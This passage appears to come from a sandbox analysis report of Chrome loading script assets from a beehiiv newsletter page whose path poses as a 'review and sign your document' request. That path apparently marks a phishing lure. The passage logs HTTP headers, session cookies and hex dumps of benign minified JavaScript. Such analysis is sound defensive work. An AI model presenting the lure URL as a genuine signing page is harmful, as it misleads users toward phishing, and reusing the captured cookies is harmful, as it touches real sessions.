                                                                                                                                            2025-01-15 18:14:39 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 32 35 36 36 38 33 61 2d 33 32 64 65 2d 35 32 35 36 2d 62 30 32 61 2d 32 30 64 62 64 64 31 39 32 38 30 36 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c256683a-32de-5256-b02a-20dbdd192806")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC391INData Raw: 6b 65 57 69 64 74 68 3a 31 2e 35 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 74 7d 2c 6f 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 74 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 3a 22 72 6f 75 6e 64 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 3a 22 72 6f 75 6e 64 22 2c 64 3a 22 6d 38 2e 32 35 20 34 2e 35 20 37 2e 35 20 37 2e 35 2d 37 2e 35 20 37 2e 35 22 7d 29 29 7d 63 6f 6e 73 74 20 73 3d
                                                                                                                                            Data Ascii: keWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:n,"aria-labelledby":t},o),r?e.createElement("title",{id:t},r):null,e.createElement("path",{strokeLinecap:"round",strokeLinejoin:"round",d:"m8.25 4.5 7.5 7.5-7.5 7.5"}))}const s=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            125192.168.2.1649852104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC847OUTGET /assets/relativeTime-tlGPeD3Q.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1711
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"6af-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4166
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8be0cdf42b7-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 66 39 36 64 63 64 31 2d 39 37 33 38 2d 35 62 36 33 2d 38 38 63 31 2d 39 63 62 62 30 36 31 61 65 66 35 32 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ff96dcd1-9738-5b63-88c1-9cbb061aef52")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC1254INData Raw: 61 73 74 3a 22 25 73 20 61 67 6f 22 2c 73 3a 22 61 20 66 65 77 20 73 65 63 6f 6e 64 73 22 2c 6d 3a 22 61 20 6d 69 6e 75 74 65 22 2c 6d 6d 3a 22 25 64 20 6d 69 6e 75 74 65 73 22 2c 68 3a 22 61 6e 20 68 6f 75 72 22 2c 68 68 3a 22 25 64 20 68 6f 75 72 73 22 2c 64 3a 22 61 20 64 61 79 22 2c 64 64 3a 22 25 64 20 64 61 79 73 22 2c 4d 3a 22 61 20 6d 6f 6e 74 68 22 2c 4d 4d 3a 22 25 64 20 6d 6f 6e 74 68 73 22 2c 79 3a 22 61 20 79 65 61 72 22 2c 79 79 3a 22 25 64 20 79 65 61 72 73 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 72 2c 74 2c 69 2c 6d 29 7b 72 65 74 75 72 6e 20 65 2e 66 72 6f 6d 54 6f 42 61 73 65 28 72 2c 74 2c 69 2c 6d 29 7d 75 2e 65 6e 2e 72 65 6c 61 74 69 76 65 54 69 6d 65 3d 79 2c 65 2e 66 72 6f 6d 54 6f 42 61 73 65 3d 66 75 6e 63 74 69 6f 6e 28 72 2c
                                                                                                                                            Data Ascii: ast:"%s ago",s:"a few seconds",m:"a minute",mm:"%d minutes",h:"an hour",hh:"%d hours",d:"a day",dd:"%d days",M:"a month",MM:"%d months",y:"a year",yy:"%d years"};function x(r,t,i,m){return e.fromToBase(r,t,i,m)}u.en.relativeTime=y,e.fromToBase=function(r,


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            126192.168.2.1649853104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC847OUTGET /assets/HeroChatIcon-DZxH_rr3.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1830
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"726-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4166
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8be1d9a18cc-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 32 38 34 32 62 35 30 31 2d 36 66 36 64 2d 35 31 38 30 2d 62 63 36 36 2d 66 65 62 33 61 37 30 62 31 64 32 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2842b501-6f6d-5180-bc66-feb3a70b1d2e")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 31 2e 35 2c 73 74 72 6f 6b 65 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 73 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 6f 7d 2c 6e 29 2c 72 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 6f 7d 2c 72 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c
                                                                                                                                            Data Ascii: ,Object.assign({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24",strokeWidth:1.5,stroke:"currentColor","aria-hidden":"true","data-slot":"icon",ref:s,"aria-labelledby":o},n),r?e.createElement("title",{id:o},r):null,e.createElement("path",
                                                                                                                                            2025-01-15 18:14:39 UTC4INData Raw: 64 32 65 0a
                                                                                                                                            Data Ascii: d2e


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            127192.168.2.1649854104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC563OUTGET /assets/useSignupRedirects-DpD4LtfX.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1971
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"7b3-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bec86b4382-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 35 32 37 62 66 38 61 2d 38 64 35 61 2d 35 36 31 63 2d 38 64 61 35 2d 35 64 62 31 66 38 66 64 63 63 66 37 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f527bf8a-8d5a-561c-8da5-5db1f8fdccf7")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 3d 65 3f 65 3f 2e 72 65 64 69 72 65 63 74 73 3f 2e 6c 65 6e 67 74 68 3a 30 2c 45 3d 28 65 3f 65 3f 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 2b 31 3a 30 29 2f 68 2a 31 30 30 2c 72 3d 28 29 3d 3e 7b 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 75 2e 53 49 47 4e 55 50 5f 52 45 44 49 52 45 43 54 53 29 7d 3b 72 65 74 75 72 6e 20 78 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 73 3d 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 75 2e 53 49 47 4e 55 50 5f 52 45 44 49 52 45 43 54 53 29 3b 69 66 28 73 29 7b 63 6f 6e 73 74 20 63 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 29 2e 73 74 61 72 74 65 64 41 74 2c 6e 3d 6e 65 77 20 44 61 74 65 28 63 29 2e 67 65 74 54 69 6d 65 28 29 2c 69 3d 6e 65 77 20 44 61 74 65
                                                                                                                                            Data Ascii: =e?e?.redirects?.length:0,E=(e?e?.currentIndex+1:0)/h*100,r=()=>{localStorage.removeItem(u.SIGNUP_REDIRECTS)};return x.useEffect(()=>{const s=localStorage.getItem(u.SIGNUP_REDIRECTS);if(s){const c=JSON.parse(s).startedAt,n=new Date(c).getTime(),i=new Date
                                                                                                                                            2025-01-15 18:14:39 UTC134INData Raw: 6c 29 7d 7d 7d 7d 7d 2c 79 3d 43 3b 65 78 70 6f 72 74 7b 79 20 61 73 20 75 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 75 73 65 53 69 67 6e 75 70 52 65 64 69 72 65 63 74 73 2d 44 70 44 34 4c 74 66 58 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 66 35 32 37 62 66 38 61 2d 38 64 35 61 2d 35 36 31 63 2d 38 64 61 35 2d 35 64 62 31 66 38 66 64 63 63 66 37 0a
                                                                                                                                            Data Ascii: l)}}}}},y=C;export{y as u};//# sourceMappingURL=useSignupRedirects-DpD4LtfX.js.map//# debugId=f527bf8a-8d5a-561c-8da5-5db1f8fdccf7


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            128192.168.2.1649855104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC851OUTGET /assets/FreeGatedContent-D-EWr0IZ.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 2472
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"9a8-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4166
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8bf4e310caa-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 66 32 35 32 34 35 63 2d 37 36 64 63 2d 35 31 31 31 2d 62 38 62 36 2d 32 32 63 31 66 64 61 36 34 37 34 38 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0f25245c-76dc-5111-b8b6-22c1fda64748")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 2c 4c 20 61 73 20 6e 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 66 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 46 20 61 73 20 79 7d 66 72 6f 6d 22 2e 2f 4c 6f 63 6b 43 6c 6f 73 65 64 49 63 6f 6e 2d 42 6c 75 6f 43 55 4d 49 2e 6a 73 22 3b 63 6f 6e 73 74 20 76 3d 28 7b 74 69 74 6c 65 3a 6c 2c 6d 65 73 73 61 67 65 3a 63 2c 63 74 61 3a 69 2c 70 75 62 6c 69 63 61 74 69 6f 6e 3a 61 2c 74 68 65 6d 65 3a 65 2c 63 72 65 61 74 65 41 63 74 69 6f 6e 54 79 70 65 3a 78 3d 67 2e 47 41 54 45 44 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 73 69 67 6e 75 70 57 69 64 67 65 74 43 6f 6e 66 69 67 73 3a 62 7d 3d 70 28
                                                                                                                                            Data Ascii: ,L as n}from"./components-Oj2xMfGE.js";import{u as f}from"./useTranslation-CfKJAmGY.js";import{F as y}from"./LockClosedIcon-BluoCUMI.js";const v=({title:l,message:c,cta:i,publication:a,theme:e,createActionType:x=g.GATED})=>{const{signupWidgetConfigs:b}=p(
                                                                                                                                            2025-01-15 18:14:39 UTC646INData Raw: 65 78 74 2d 73 6d 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 72 28 22 6c 6f 67 69 6e 2e 61 6c 72 65 61 64 79 5f 61 5f 73 75 62 73 63 72 69 62 65 72 22 29 2c 73 2e 6a 73 78 73 28 6e 2c 7b 74 6f 3a 22 2f 6c 6f 67 69 6e 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 6c 2d 31 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 73 2e 6a 73 78 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6f 28 22 75 6e 64 65 72 6c 69 6e 65 20 75 6e 64 65 72 6c 69 6e 65 2d 6f 66 66 73 65 74 2d 31 22 2c 7b 22 74 65 78 74 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 22 3a 65 21 3d 3d 22 73 75 62 73 63 72 69 62 65 2d 67 61 74 65 22 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 72 28 22 73 68 61 72 65 64 2e 63 74 61 2e 73 69 67 6e 5f 69 6e 22 29 7d 29 2c 22 2e 22 5d 7d 29 5d 7d 29 2c 73
